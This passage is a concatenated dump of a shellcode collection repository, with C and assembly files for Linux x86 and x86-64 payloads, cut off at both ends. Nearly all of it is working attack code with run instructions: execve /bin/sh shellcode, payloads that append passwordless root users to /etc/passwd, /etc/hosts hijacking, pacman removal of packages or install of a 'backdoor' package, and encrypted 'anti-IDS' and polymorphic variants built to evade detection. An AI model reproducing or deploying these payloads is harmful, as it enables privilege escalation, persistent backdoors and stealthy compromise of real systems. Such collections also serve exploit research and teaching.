61 6a 69 74 pushq $0x74696a61 22 | 400089: 54 push %rsp 23 | 40008a: 5f pop %rdi 24 | 40008b: 6a 53 pushq $0x53 25 | 40008d: 58 pop %rax 26 | 40008e: 66 be ef 01 mov $0x1ef,%si 27 | 400092: 0f 05 syscall 28 | 400094: 6a 3c pushq $0x3c 29 | 400096: 58 pop %rax 30 | 400097: 0f 05 syscall 31 | --------------------------------------------------------------------------------------------------- 32 | 33 | How To Run 34 | 35 | $ gcc -o mkdir_shellcode_linux_x64 mkdir_shellcode_linux_x64.c -z execstack 36 | $ ./mkdir_shellcode_linux_x64 37 | 38 | --------------------------------------------------------------------------------------------------- 39 | */ 40 | #include 41 | char sh[]="\x48\x31\xf6\x56\x68\x61\x6a\x69\x74\x54\x5f\x6a\x53\x58\x66\xbe\xef\x01\x0f\x05\x6a\x3c\x58\x0f\x05"; 42 | void main(int argc, char **argv) 43 | { 44 | int (*func)(); 45 | func = (int (*)()) sh; 46 | (int)(*func)(); 47 | } -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_mkdir____evil__Shellcode__30_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | ;Title: Linux/x86_64 - mkdir() shellcode (30 bytes) 3 | ;Author: Touhid M.Shaikh 4 | ;Contact: *https://github.com/touhidshaikh 5 | * 6 | ;Category: Shellcode 7 | ;Architecture: Linux x86_64 8 | ;Description: Create Folder with 755 permission. 
9 | ; You can Change folder by change code in ASM in fname Field 10 | ;Shellcode Length: 30 11 | ;Tested on : Debian 4.12.6-1kali6 (2017-08-30) x86_64 GNU/Linux 12 | 13 | 14 | 15 | ===== COMPILATION AND EXECUTION Assemmbly file ===== 16 | 17 | #nasm -f elf64 shell.asm -o shell.o <=== Making Object File 18 | 19 | #ld shell.o -o shell <=== Making Binary File 20 | 21 | #./bin2shell.sh shell <== xtract hex code from the binary 22 | (https://github.com/touhidshaikh/bin2shell) 23 | 24 | =================SHELLCODE(INTEL FORMAT)================= 25 | 26 | section .text 27 | global _start 28 | _start: 29 | jmp folder 30 | main: 31 | xor rax,rax 32 | pop rdi 33 | mov si,0x1ef ;<--- Set Permission 34 | add al,83 35 | syscall 36 | 37 | xor rax,rax 38 | add al,60 39 | syscall 40 | folder: 41 | call main 42 | fname db "evil" ;<---Change Folder Name Here 43 | 44 | 45 | =======================END HERE============================ 46 | 47 | ====================FOR C Compile=========================== 48 | 49 | Compile with gcc with some options. 50 | 51 | # gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing 52 | 53 | */ 54 | 55 | #include 56 | #include 57 | 58 | 59 | unsigned char code[] = "\xeb\x13\x48\x31\xc0\x5f\x66\ 60 | xbe\xef\x01\x04\x53\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\ 61 | xe8\xe8\xff\xff\xff\x65\x76\x69\x6c"; 62 | 63 | main() 64 | { 65 | 66 | printf("Shellcode Length: %d\n", (int)strlen(code)); 67 | 68 | int (*ret)() = (int(*)())code; 69 | 70 | ret(); 71 | 72 | } -------------------------------------------------------------------------------- /Lin_x86/Linux_IA32_-_execve__bin_sh_0xff-Free_Shellcode__45_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | 0xff-less execve() /bin/sh by anathema 4 | 5 | */ 6 | 7 | #include 8 | #include 9 | 10 | unsigned char code[] = 11 | 12 | /* Linux/IA32 0xff-less execve() shellcode. 
*/ 13 | 14 | "\x89\xe6" /* movl %esp, %esi */ 15 | "\x83\xc6\x30" /* addl $0x30, %esi */ 16 | "\xb8\x2e\x62\x69\x6e" /* movl $0x6e69622e, %eax */ 17 | "\x40" /* incl %eax */ 18 | "\x89\x06" /* movl %eax, (%esi) */ 19 | "\xb8\x2e\x73\x68\x21" /* movl $0x2168732e, %eax */ 20 | "\x40" /* incl %eax */ 21 | "\x89\x46\x04" /* movl %eax, 0x04(%esi) */ 22 | "\x29\xc0" /* subl %eax, %eax */ 23 | "\x88\x46\x07" /* movb %al, 0x07(%esi) */ 24 | "\x89\x76\x08" /* movl %esi, 0x08(%esi) */ 25 | "\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */ 26 | "\xb0\x0b" /* movb $0x0b, %al */ 27 | "\x87\xf3" /* xchgl %esi, %ebx */ 28 | "\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */ 29 | "\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */ 30 | "\xcd\x80" /* int $0x80 */ 31 | ; 32 | 33 | void main() 34 | { 35 | void (*s)() = (void *)code; 36 | 37 | printf("Shellcode length: %d\nExecuting..\n\n", 38 | strlen(code)); 39 | s(); 40 | } 41 | 42 | // milw0rm.com [2004-09-26] -------------------------------------------------------------------------------- /Lin_x86/Linux_i686_-_pacman_-R__package__Shellcode__59_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | Title : Linux i686 - pacman -R - 59 bytes 3 | Author : Jonathan Salwan 4 | Mail : submit [!] shell-storm.org 5 | Web : http://www.shell-storm.org 6 | 7 | Pacman is a software package manager, developed as part of the Arch Linux distribution. 8 | With this shellcode you can remove the packages. 9 | 10 | ! DataBase of Shellcodes and you can share your shellcodes : http://www.shell-storm.org/shellcode/ ! 
11 | 12 | 13 | Disassembly of section .text: 14 | 15 | 08048054 <.text>: 16 | 8048054: 31 c0 xor %eax,%eax 17 | 8048056: 31 db xor %ebx,%ebx 18 | 8048058: 31 c9 xor %ecx,%ecx 19 | 804805a: 31 d2 xor %edx,%edx 20 | 804805c: 31 f6 xor %esi,%esi 21 | 804805e: 52 push %edx 22 | 804805f: 68 61 61 61 61 push $0x61616161 23 | 8048064: 89 e6 mov %esp,%esi 24 | 8048066: 52 push %edx 25 | 8048067: 66 68 2d 52 pushw $0x522d 26 | 804806b: 89 e1 mov %esp,%ecx 27 | 804806d: 52 push %edx 28 | 804806e: 68 63 6d 61 6e push $0x6e616d63 29 | 8048073: 68 6e 2f 70 61 push $0x61702f6e 30 | 8048078: 68 72 2f 62 69 push $0x69622f72 31 | 804807d: 68 2f 2f 75 73 push $0x73752f2f 32 | 8048082: 89 e3 mov %esp,%ebx 33 | 8048084: 52 push %edx 34 | 8048085: 56 push %esi 35 | 8048086: 51 push %ecx 36 | 8048087: 53 push %ebx 37 | 8048088: 89 e1 mov %esp,%ecx 38 | 804808a: b0 0b mov $0xb,%al 39 | 804808c: 99 cltd 40 | 804808d: cd 80 int $0x80 41 | 42 | */ 43 | 44 | 45 | #include 46 | 47 | int main(void) 48 | { 49 | char shellcode[] = 50 | 51 | "\x31\xc0\x31\xdb\x31\xc9\x31" 52 | "\xd2\x31\xf6\x52\x68" 53 | "\x61\x61\x61\x61" // <- package is "aaaa", you can change it. 54 | "\x89\xe6\x52\x66\x68\x2d\x52" 55 | "\x89\xe1\x52\x68\x63\x6d\x61" 56 | "\x6e\x68\x6e\x2f\x70\x61\x68" 57 | "\x72\x2f\x62\x69\x68\x2f\x2f" 58 | "\x75\x73\x89\xe3\x52\x56\x51" 59 | "\x53\x89\xe1\xb0\x0b\x99\xcd" 60 | "\x80"; 61 | 62 | printf("Length: %d\n",strlen(shellcode)); 63 | (*(void(*)()) shellcode)(); 64 | 65 | return 0; 66 | } -------------------------------------------------------------------------------- /Lin_x86/Linux_i686_-_pacman_-S__package___default_package:_backdoor__Shellcode__64_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | Title : Linux i686 - pacman -S (default package: backdoor) - 64 bytes 3 | Author : Jonathan Salwan 4 | Mail : submit [!] 
shell-storm.org 5 | Web : http://www.shell-storm.org 6 | 7 | Pacman is a software package manager, developed as part of the Arch Linux distribution. 8 | With this shellcode you can install the backdoor packages. 9 | 10 | ! DataBase of Shellcodes and you can share your shellcodes : http://www.shell-storm.org/shellcode/ ! 11 | 12 | 13 | Disassembly of section .text: 14 | 15 | 08048054 <.text>: 16 | 8048054: 31 c0 xor %eax,%eax 17 | 8048056: 31 db xor %ebx,%ebx 18 | 8048058: 31 c9 xor %ecx,%ecx 19 | 804805a: 31 d2 xor %edx,%edx 20 | 804805c: 31 f6 xor %esi,%esi 21 | 804805e: 52 push %edx 22 | 804805f: 68 64 6f 6f 72 push $0x726f6f64 << This is a package 23 | 8048064: 68 62 61 63 6b push $0x6b636162 << (backdoor). You can change it. 24 | 8048069: 89 e6 mov %esp,%esi 25 | 804806b: 52 push %edx 26 | 804806c: 66 68 2d 53 pushw $0x532d 27 | 8048070: 89 e1 mov %esp,%ecx 28 | 8048072: 52 push %edx 29 | 8048073: 68 63 6d 61 6e push $0x6e616d63 30 | 8048078: 68 6e 2f 70 61 push $0x61702f6e 31 | 804807d: 68 72 2f 62 69 push $0x69622f72 32 | 8048082: 68 2f 2f 75 73 push $0x73752f2f 33 | 8048087: 89 e3 mov %esp,%ebx 34 | 8048089: 52 push %edx 35 | 804808a: 56 push %esi 36 | 804808b: 51 push %ecx 37 | 804808c: 53 push %ebx 38 | 804808d: 89 e1 mov %esp,%ecx 39 | 804808f: b0 0b mov $0xb,%al 40 | 8048091: 99 cltd 41 | 8048092: cd 80 int $0x80 42 | 43 | 44 | */ 45 | 46 | 47 | #include 48 | 49 | int main(void) 50 | { 51 | char shellcode[] = 52 | 53 | "\x31\xc0\x31\xdb\x31\xc9\x31" 54 | "\xd2\x31\xf6\x52\x68\x64\x6f" 55 | "\x6f\x72\x68\x62\x61\x63\x6b" 56 | "\x89\xe6\x52\x66\x68\x2d\x52" 57 | "\x89\xe1\x52\x68\x63\x6d\x61" 58 | "\x6e\x68\x6e\x2f\x70\x61\x68" 59 | "\x72\x2f\x62\x69\x68\x2f\x2f" 60 | "\x75\x73\x89\xe3\x52\x56\x51" 61 | "\x53\x89\xe1\xb0\x0b\x99\xcd" 62 | "\x80"; 63 | 64 | printf("Length: %d\n",strlen(shellcode)); 65 | (*(void(*)()) shellcode)(); 66 | 67 | return 0; 68 | } -------------------------------------------------------------------------------- 
/Lin_x86/Linux_x86_-_Add_Map__google_com_127_1_1_1__In__etc_hosts_Obfuscated_Shellcode__98_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Linux x86 - map google.com to 127.1.1.1 in /etc/hosts 3 | * Obfuscated version - 98 bytes 4 | * Original: http://shell-storm.org/shellcode/files/shellcode-893.php 5 | * Author: xmgv 6 | * Details: https://xmgv.wordpress.com/2015/03/13/slae-6-polymorphic-shellcode/ 7 | */ 8 | 9 | /* 10 | global _start 11 | 12 | section .text 13 | 14 | _start: 15 | push byte 0x4 16 | pop eax 17 | inc eax 18 | sub edx, edx 19 | push edx 20 | mov ecx, 0x88998899 21 | sub ecx, 0x1525152A 22 | push ecx 23 | sub ecx, 0x0B454440 24 | push ecx 25 | sub ecx, 0x04BACA01 26 | inc ecx 27 | push ecx 28 | sub ecx, 0x6374612E 29 | mov ebx, esp 30 | int 0x80 31 | xchg eax, ebx 32 | jmp short _load_data 33 | 34 | _write: 35 | pop eax 36 | xchg eax, ecx 37 | push byte 0x3 38 | pop esi 39 | mov eax, esi 40 | inc eax 41 | push len 42 | pop edx 43 | int 0x80 44 | inc esi 45 | inc esi 46 | inc esi 47 | xchg eax, esi 48 | int 0x80 49 | inc eax 50 | int 0x80 51 | 52 | _load_data: 53 | call _write 54 | google: db "127.1.1.1 google.com" 55 | len: equ $-google 56 | 57 | _random: 58 | cld 59 | xor esi,esi 60 | cld 61 | */ 62 | 63 | #include 64 | #include 65 | 66 | unsigned char code[] = 67 | "\x6a\x04\x58\x40\x29\xd2\x52\xb9\x99\x88\x99\x88\x81\xe9\x2a\x15\x25\x15" 68 | "\x51\x81\xe9\x40\x44\x45\x0b\x51\x81\xe9\x01\xca\xba\x04\x41\x51\x81\xe9" 69 | "\x2e\x61\x74\x63\x89\xe3\xcd\x80\x93\xeb\x16\x58\x91\x6a\x03\x5e\x89\xf0" 70 | "\x40\x6a\x14\x5a\xcd\x80\x46\x46\x46\x96\xcd\x80\x40\xcd\x80\xe8\xe5\xff" 71 | "\xff\xff\x31\x32\x37\x2e\x31\x2e\x31\x2e\x31\x20\x67\x6f\x6f\x67\x6c\x65" 72 | "\x2e\x63\x6f\x6d\xfc\x31\xf6\xfc"; 73 | 74 | int main() { 75 | printf("Shellcode Length: %d\n", strlen(code)); 76 | int (*ret)() = (int(*)())code; 77 | ret(); 78 | } 
-------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Add_Map__google_com_127_1_1_1__In__etc_hosts_Shellcode__77_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /** 2 | 3 | ;modify_hosts.asm 4 | ;this program add a new entry in hosts file pointing google.com to 127.1.1.1 5 | ;author Javier Tejedor 6 | ;date 24/09/2014 7 | 8 | global _start 9 | 10 | section .text 11 | 12 | _start: 13 | xor ecx, ecx 14 | mul ecx 15 | mov al, 0x5 16 | push ecx 17 | push 0x7374736f ;/etc///hosts 18 | push 0x682f2f2f 19 | push 0x6374652f 20 | mov ebx, esp 21 | mov cx, 0x401 ;permmisions 22 | int 0x80 ;syscall to open file 23 | 24 | xchg eax, ebx 25 | push 0x4 26 | pop eax 27 | jmp short _load_data ;jmp-call-pop technique to load the map 28 | 29 | _write: 30 | pop ecx 31 | push 20 ;length of the string, dont forget to modify if changes the map 32 | pop edx 33 | int 0x80 ;syscall to write in the file 34 | 35 | push 0x6 36 | pop eax 37 | int 0x80 ;syscall to close the file 38 | 39 | push 0x1 40 | pop eax 41 | int 0x80 ;syscall to exit 42 | 43 | _load_data: 44 | call _write 45 | google db "127.1.1.1 google.com" 46 | **/ 47 | 48 | #include 49 | #include 50 | 51 | unsigned char code[] = \ 52 | "\x31\xc9\xf7\xe1\xb0\x05\x51\x68\x6f\x73\x74\x73\x68\x2f\x2f\x2f\x68\x68\x2f\x65\x74\x63\x89\xe3\x66\xb9\x01\x04\xcd\x80\x93\x6a\x04\x58\xeb\x10\x59\x6a\x14\x5a\xcd\x80\x6a\x06\x58\xcd\x80\x6a\x01\x58\xcd\x80\xe8\xeb\xff\xff\xff\x31\x32\x37\x2e\x31\x2e\x31\x2e\x31\x20\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d"; 53 | 54 | main() 55 | { 56 | 57 | printf("Shellcode Length: %d\n", strlen(code)); 58 | 59 | int (*ret)() = (int(*)())code; 60 | 61 | ret(); 62 | 63 | } -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Add_Root_User_Shellcode__104_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: 
-------------------------------------------------------------------------------- 1 | /* 2 | * Source to this is pass.s 3 | * This will append a root line to the passwd file (see the source). 4 | * 5 | * Shok (Matt Conover), shok@dataforce.net 6 | */ 7 | 8 | char shellcode[]= 9 | "\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff\x31\xdb\xb3\x35\x01\xfb" 10 | "\x30\xc0\x88\x43\x0b\x31\xc9\x66\xb9\x41\x04\x31\xd2\x66\xba\xa4" 11 | "\x01\x31\xc0\xb0\x05\xcd\x80\x89\xc3\x31\xc9\xb1\x41\x01\xf9\x31" 12 | "\xd2\xb2\x1f\x31\xc0\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x2f" 13 | "\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x01\x77\x30\x30\x77\x30" 14 | "\x30\x3a\x3a\x30\x3a\x30\x3a\x77\x30\x77\x30\x77\x21\x3a\x2f\x3a" 15 | "\x2f\x62\x69\x6e\x2f\x73\x68\x0a"; 16 | 17 | void main() 18 | { 19 | 20 | int *ret; 21 | 22 | printf("w00w00!\n"); 23 | ret = (int *)&ret + 2; 24 | (*ret) = (int)shellcode; 25 | } 26 | 27 | // milw0rm.com [2004-09-12] -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Add_Root_User__r00t__To__etc_passwd_Shellcode__69_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* By Kris Katterjohn 11/14/2006 2 | * 3 | * 69 byte shellcode to add root user 'r00t' with no password to /etc/passwd 4 | * 5 | * for Linux/x86 6 | * 7 | * 8 | * 9 | * section .text 10 | * 11 | * global _start 12 | * 13 | * _start: 14 | * 15 | * ; open("/etc//passwd", O_WRONLY | O_APPEND) 16 | * 17 | * push byte 5 18 | * pop eax 19 | * xor ecx, ecx 20 | * push ecx 21 | * push 0x64777373 22 | * push 0x61702f2f 23 | * push 0x6374652f 24 | * mov ebx, esp 25 | * mov cx, 02001Q 26 | * int 0x80 27 | * 28 | * mov ebx, eax 29 | * 30 | * ; write(ebx, "r00t::0:0:::", 12) 31 | * 32 | * push byte 4 33 | * pop eax 34 | * xor edx, edx 35 | * push edx 36 | * push 0x3a3a3a30 37 | * push 0x3a303a3a 38 | * push 0x74303072 39 | * mov ecx, esp 40 | * push byte 12 41 | * pop edx 
42 | * int 0x80 43 | * 44 | * ; close(ebx) 45 | * 46 | * push byte 6 47 | * pop eax 48 | * int 0x80 49 | * 50 | * ; exit() 51 | * 52 | * push byte 1 53 | * pop eax 54 | * int 0x80 55 | */ 56 | 57 | main() 58 | { 59 | char shellcode[] = 60 | "\x6a\x05\x58\x31\xc9\x51\x68\x73\x73\x77\x64\x68" 61 | "\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe3\x66" 62 | "\xb9\x01\x04\xcd\x80\x89\xc3\x6a\x04\x58\x31\xd2" 63 | "\x52\x68\x30\x3a\x3a\x3a\x68\x3a\x3a\x30\x3a\x68" 64 | "\x72\x30\x30\x74\x89\xe1\x6a\x0c\x5a\xcd\x80\x6a" 65 | "\x06\x58\xcd\x80\x6a\x01\x58\xcd\x80"; 66 | 67 | (*(void (*)()) shellcode)(); 68 | } 69 | 70 | // milw0rm.com [2006-11-17] -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Add_Root_User__t00r__Anti-IDS_Shellcode__116_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * !!!!!! ANTI IDS SHELLCODE !!!!!! 3 | * 4 | * s0t4ipv6@shellcode.com.ar 5 | * 0x14abril0x7d2 6 | * 7 | * !!!!! ENCRIPTADA !!!!! 8 | 9 | * 116 bytes 10 | * Agrega la linea "t00r::0:0::/:/bin/sh" en /etc/passwd 11 | 12 | * !!!!! ENCRIPTADA !!!!! 13 | * 14 | * Para mas informacion 15 | * Descargue http://www.shellcode.com.ar/Projects/JempiScodes(version).tgz 16 | * 17 | * !!!!!! ANTI IDS SHELLCODE !!!!!! 
18 | */ 19 | 20 | #include 21 | 22 | char shellcode[]= 23 | "\xeb\x1b\x5f\x31\xc0\x6a\x28\x6a\x52\x59\x49\x5b\x8a\x04\x0f" 24 | "\xf6\xd3\x30\xd8\x88\x04\x0f\x50\x85\xc9\x75\xef\xeb\x05\xe8" 25 | "\xe0\xff\xff\xff\x0e\x6f\xc7\xe4\xff\xfb\xec\xf3\xf4\xb3\xa0" 26 | "\xee\xf6\xb8\xff\xb5\xee\x02\x95\x91\x3a\xb5\x70\x32\xba\x37" 27 | "\xb2\xf6\xb5\xbb\xb2\x04\x07\x86\x5c\x21\xb2\x2e\xc6\xf9\xbe" 28 | "\xa3\xe4\xff\xad\xea\xb2\xf4\xfe\xa7\xf5\xff\xea\xb8\xad\xff" 29 | "\xf5\xf5\xad\xe3\xbb\xff\xbd\x3f\x59\x66\x33\xba\x72\x97\xd3" 30 | "\xb2\x4e\x0e\x8f\x49\x34\xb2\x3f\x72\xb2\x57"; 31 | 32 | main() { 33 | int *ret; 34 | ret=(int *)&ret+2; 35 | printf("Shellcode lenght=%d\n",strlen(shellcode)); 36 | (*ret) = (int)shellcode; 37 | } 38 | 39 | // milw0rm.com [2004-09-26] -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Add_Root_User__t00r__Shellcode__82_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * s0t4ipv6@shellcode.com.ar 3 | * 0x14abril0x7d2 4 | * 5 | * 82 bytes 6 | * Agrega la linea "t00r::0:0::/:/bin/sh" en /etc/passwd 7 | * 8 | * Encriptada en http://www.shellcode.com.ar/linux/lnx-t00r-cr1.c 9 | * 10 | */ 11 | 12 | #include 13 | 14 | // Shellcode // Asm Code 15 | char shellcode[]= 16 | "\x31\xc0" // xorl %eax,%eax 17 | "\x50" // pushl %eax 18 | "\x68\x73\x73\x77\x64" // pushl $0x64777373 19 | "\x68\x63\x2f\x70\x61" // pushl $0x61702f63 20 | "\x68\x2f\x2f\x65\x74" // pushl $0x74652f2f 21 | "\x89\xe3" // movl %esp,%ebx 22 | "\x8d\x48\x02" // leal 0x2(%eax),%ecx 23 | "\x8d\x40\x05" // leal 0x5(%eax),%eax 24 | "\xcd\x80" // int $0x80 25 | "\x89\xc3" // movl %eax,%ebx 26 | "\x87\xca" // xchgl %ecx,%edx 27 | "\x31\xc9" // xorl %ecx,%ecx 28 | "\xb0\x13" // movb $0x13,%al 29 | "\xcd\x80" // int $0x80 30 | "\x51" // pushl %ecx 31 | "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e 32 | "\x68\x3a\x2f\x62\x69" // pushl 
$0x69622f3a 33 | "\x68\x30\x3a\x3a\x2f" // pushl $0x2f3a3a30 34 | "\x68\x3a\x3a\x30\x3a" // pushl $0x3a303a3a 35 | "\x68\x74\x30\x30\x72" // pushl $0x72303074 36 | "\x8d\x41\x04" // leal 0x4(%ecx),%eax 37 | "\x89\xe1" // movl %esp,%ecx 38 | "\xb2\x14" // movb $0x14,%dl 39 | "\xcd\x80" // int $0x80 40 | "\x31\xc0" // xorl %eax,%eax 41 | "\xb0\x06" // movb $0x6,%al 42 | "\xcd\x80" // int $0x80 43 | "\x40" // incl %eax 44 | "\xcd\x80"; // int $0x80 45 | 46 | main() { 47 | int *ret; 48 | ret=(int *)&ret+2; 49 | printf("Shellcode lenght=%d\n",strlen(shellcode)); 50 | (*ret) = (int)shellcode; 51 | } 52 | 53 | // milw0rm.com [2004-09-12] -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Add_Root_User__toor__To__etc_passwd_+_exit___Shellcode__107_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | append_passwd.c 3 | Payload: Adds the string: [toor::0:0:t00r:/root:/bin/bash] to /etc/passwd thereby adding a password-less root account with login name "toor" 4 | Platform: linux/x86 5 | Size: 107 bytes 6 | Author: $andman 7 | */ 8 | 9 | /* 10 | 08049054 <_start>: 11 | 8049054: eb 38 jmp 804908e 12 | 13 | 08049056 : 14 | 8049056: 5e pop %esi 15 | 8049057: 31 c0 xor %eax,%eax 16 | 8049059: 88 46 0b mov %al,0xb(%esi) 17 | 804905c: 88 46 2b mov %al,0x2b(%esi) 18 | 804905f: c6 46 2a 0a movb $0xa,0x2a(%esi) 19 | 8049063: 8d 5e 0c lea 0xc(%esi),%ebx 20 | 8049066: 89 5e 2c mov %ebx,0x2c(%esi) 21 | 8049069: 8d 1e lea (%esi),%ebx 22 | 804906b: 66 b9 42 04 mov $0x442,%cx 23 | 804906f: 66 ba a4 01 mov $0x1a4,%dx 24 | 8049073: b0 05 mov $0x5,%al 25 | 8049075: cd 80 int $0x80 26 | 8049077: 89 c3 mov %eax,%ebx 27 | 8049079: 31 d2 xor %edx,%edx 28 | 804907b: 8b 4e 2c mov 0x2c(%esi),%ecx 29 | 804907e: b2 1f mov $0x1f,%dl 30 | 8049080: b0 04 mov $0x4,%al 31 | 8049082: cd 80 int $0x80 32 | 8049084: b0 06 mov $0x6,%al 33 | 8049086: cd 80 int $0x80 
34 | 8049088: b0 01 mov $0x1,%al 35 | 804908a: 31 db xor %ebx,%ebx 36 | 804908c: cd 80 int $0x80 37 | 38 | 0804908e : 39 | 804908e: e8 c3 ff ff ff call 8049056 40 | 8049093: ......string....... 41 | */ 42 | 43 | #include 44 | #include 45 | 46 | char shell[]= "\xeb\x38\x5e\x31\xc0\x88\x46\x0b\x88\x46\x2b\xc6\x46\x2a\x0a\x8d\x5e\x0c\x89\x5e\x2c\x8d\x1e" 47 | "\x66\xb9\x42\x04\x66\xba\xa4\x01\xb0\x05\xcd\x80\x89\xc3\x31\xd2\x8b\x4e\x2c\xb2\x1f\xb0\x04" 48 | "\xcd\x80\xb0\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xc3\xff\xff\xff\x2f\x65\x74\x63\x2f\x70" 49 | "\x61\x73\x73\x77\x64\x23\x74\x6f\x6f\x72\x3a\x3a\x30\x3a\x30\x3a\x74\x30\x30\x72\x3a\x2f\x72" 50 | "\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x20\x23"; 51 | main(){ 52 | printf("[+]shellcode length %d\n", strlen(shell)); 53 | int *ret; 54 | ret = (int *)&ret + 2; 55 | (*ret) = (int)shell; 56 | } 57 | //HAPPY NEW YEAR! 58 | //#$ -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Add_Root_User__xtz__To__etc_passwd_Shellcode__59_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * (linux/x86) adds user 'xtz' without password to /etc/passwd - 59 bytes 3 | * - izik 4 | */ 5 | 6 | char shellcode[] = 7 | 8 | "\x6a\x05" // push $0x5 9 | 10 | // 11 | // <_exit>: 12 | // 13 | 14 | "\x58" // pop %eax 15 | "\x99" // cltd 16 | "\x31\xc9" // xor %ecx,%ecx 17 | "\x66\xb9\x01\x04" // mov $0x401,%cx 18 | "\x52" // push %edx 19 | "\x68\x73\x73\x77\x64" // push $0x64777373 20 | "\x68\x63\x2f\x70\x61" // push $0x61702f63 21 | "\x68\x2f\x2f\x65\x74" // push $0x74652f2f 22 | "\x89\xe3" // mov %esp,%ebx 23 | "\xcd\x80" // int $0x80 24 | "\x68\x3a\x3a\x3a\x0a" // push $0xa3a3a3a 25 | "\x68\x3a\x30\x3a\x30" // push $0x303a303a 26 | "\x68\x78\x74\x7a\x3a" // push $0x3a7a7478 27 | "\x89\xc3" // mov %eax,%ebx 28 | "\xb0\x04" // mov $0x4,%al 29 | "\x89\xe1" // mov %esp,%ecx 30 | 
"\xb2\x0c" // mov $0xc,%dl 31 | "\xcd\x80" // int $0x80 32 | "\x6a\x01" // push $0x1 33 | "\xeb\xc7"; // jmp <_exit> 34 | 35 | int main(int argc, char **argv) { 36 | int *ret; 37 | ret = (int *)&ret + 2; 38 | (*ret) = (int) shellcode; 39 | } 40 | 41 | // milw0rm.com [2006-01-21] -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Add_Root_User__z__Shellcode__70_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Linux/x86 3 | * 4 | * Appends the line "z::0:0:::\n" to /etc/passwd. 5 | * (quite old, could be optimized further) 6 | */ 7 | #include 8 | 9 | char c0de[] = 10 | /* main: */ 11 | "\xeb\x29" /* jmp callz */ 12 | /* start: */ 13 | "\x5e" /* popl %esi */ 14 | "\x29\xc0" /* subl %eax, %eax */ 15 | "\x88\x46\x0b" /* movb %al, 0x0b(%esi) */ 16 | "\x89\xf3" /* movl %esi, %ebx */ 17 | "\x66\xb9\x01\x04" /* movw $0x401, %cx */ 18 | "\x66\xba\xb6\x01" /* movw $0x1b6, %dx */ 19 | "\xb0\x05" /* movb $0x05, %al */ 20 | "\xcd\x80" /* int $0x80 */ 21 | "\x93" /* xchgl %eax, %ebx */ 22 | "\x29\xc0" /* subl %eax, %eax */ 23 | "\x29\xd2" /* subl %edx, %edx */ 24 | "\xb0\x04" /* movb $0x04, %al */ 25 | "\x89\xf1" /* movl %esi, %ecx */ 26 | "\x80\xc1\x0c" /* addb $0x0c, %cl */ 27 | "\xb2\x0a" /* movb $0x0a, %dl */ 28 | "\xcd\x80" /* int $0x80 */ 29 | "\x29\xc0" /* subl %eax, %eax */ 30 | "\x40" /* incl %eax */ 31 | "\xcd\x80" /* int $0x80 */ 32 | /* callz: */ 33 | "\xe8\xd2\xff\xff\xff" /* call start */ 34 | /* DATA */ 35 | "/etc/passwd" 36 | "\xff" 37 | "z::0:0:::\n"; 38 | 39 | main() { 40 | int *ret; 41 | ret=(int *)&ret +2; 42 | printf("Shellcode lenght=%d\n",strlen(c0de)); 43 | (*ret) = (int)c0de; 44 | } 45 | 46 | // milw0rm.com [2000-08-07] -------------------------------------------------------------------------------- 
/Lin_x86/Linux_x86_-_Alphanumeric_Encoded_Shellcode__64_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /*--------------------------------------*/ 2 | /* 64 byte alpha-numeric shellcode */ 3 | /* by XORt@dallas_2600 64bytes */ 4 | /*--------------------------------------*/ 5 | "\x6a\x30" /* pushb $0x30 */ 6 | "\x58" /* pop %eax */ 7 | "\x34\x30" /* xorb $0x30, %al */ 8 | "\x50" /* push %eax */ 9 | "\x5a" /* pop %edx */ 10 | "\x48" /* dec %eax */ 11 | "\x66\x35\x41\x30" /* xorl $0x3041, %ax */ 12 | "\x66\x35\x73\x4f" /* xorl $0x4f73, %ax */ 13 | "\x50" /* push %eax */ 14 | "\x52" /* pushl %edx */ 15 | "\x58" /* pop %eax */ 16 | "\x684J4A" /* pushl "4J4A" */ 17 | "\x68PSTY" /* pushl "PSTY" */ 18 